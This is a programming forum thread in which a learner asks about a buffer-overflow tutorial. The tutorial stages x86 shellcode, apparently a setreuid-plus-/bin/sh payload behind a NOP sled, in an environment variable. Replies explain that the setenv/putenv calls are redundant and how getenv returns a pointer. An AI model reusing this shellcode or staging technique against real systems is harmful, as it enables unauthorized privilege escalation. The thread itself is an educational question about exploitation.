Thread: Simple question regarding environment variables in Linux

  1. #1
    Registered User
    Join Date
    Dec 2006
    Posts
    15

    Simple question regarding environment variables in Linux

    Hi,

    Im learning a thing or two about buffer overflows, and a tutorial I'm reading has the following piece of code:
    Code:
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #define NOP 0x90
    
    char shellcode[] =
    '\x31\xc0\x31\xdb\x31\xd2\x53\x68\x69\x74\x79\x0a\x68\x65\x63'
    '\x75\x72\x68\x44\x4c\x20\x53\x89\xe1\xb2\x0f\xb0\x04\xcd\x80'
    '\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e'
    '\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53'
    '\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80';
    
    int main(void)
    {
      char shell[512];
      puts('Eggshell loaded into environment.');
      memset(shell,NOP,512);
      memcpy(&shell[512-strlen(shellcode)],shellcode,strlen(shellcode));
      setenv('EGG', shell, 1);
      putenv(shell);    // [1]
      system('bash'); // [2]
      return(0); 
    }
    Most of it is perfectly clear, it loads the shellcode into an environment variable, but what I am confused about is line [1] and [2]. setenv copies the shellcode, etc. to the environment variable, so what is the point of thise 2 lines?

    The tutorial also gives a second piece of code (to retrieve the memory address of the environment variable).
    Code:
    int main(void)
    {
       printf('0x&#37;lx\n', getenv('EGG'));
       return 0;
    }
    This is strange to me (and it doesnt work, I think it gives a segmentation fault), basically it gets the VALUE of the environment variable, so how on earth is it supposed to get its address?

    Any help would be appreciated.

  2. #2
    Officially An Architect brewbuck's Avatar
    Join Date
    Mar 2007
    Location
    Portland, OR
    Posts
    7,396
    Quote Originally Posted by nickkrym View Post
    Most of it is perfectly clear, it loads the shellcode into an environment variable, but what I am confused about is line [1] and [2]. setenv copies the shellcode, etc. to the environment variable, so what is the point of thise 2 lines?
    There is no point. They perform the same function. The "tutor" who wrote this code is stupid, like most crackers. (Just studying this stuff doesn't make you a cracker, by the way.)

    This is strange to me (and it doesnt work, I think it gives a segmentation fault), basically it gets the VALUE of the environment variable, so how on earth is it supposed to get its address?
    getenv returns a direct pointer into the environment. So it IS returning the address of the variable. Try overwriting the returned location with other data -- you'll corrupt other environment variables.

  3. #3
    Just Lurking Dave_Sinkula's Avatar
    Join Date
    Oct 2002
    Posts
    5,005
    Strings are enclosed within double quotes, not single quotes.
    7. It is easier to write an incorrect program than understand a correct one.
    40. There are two ways to write error-free programs; only the third one works.*

Popular pages Recent additions subscribe to a feed

Similar Threads

  1. Simple C# structure question
    By sketch in forum C# Programming
    Replies: 4
    Last Post: 09-14-2007, 04:29 PM
  2. Simple fp_in question.
    By BluePudding in forum C++ Programming
    Replies: 5
    Last Post: 08-09-2006, 08:18 AM
  3. Binary Search Trees Part III
    By Prelude in forum A Brief History of Cprogramming.com
    Replies: 16
    Last Post: 10-02-2004, 03:00 PM
  4. Simple Pointer Question
    By Reason58 in forum C Programming
    Replies: 2
    Last Post: 01-08-2004, 07:18 PM
  5. Question about LINUX
    By River21 in forum A Brief History of Cprogramming.com
    Replies: 0
    Last Post: 09-17-2001, 06:39 PM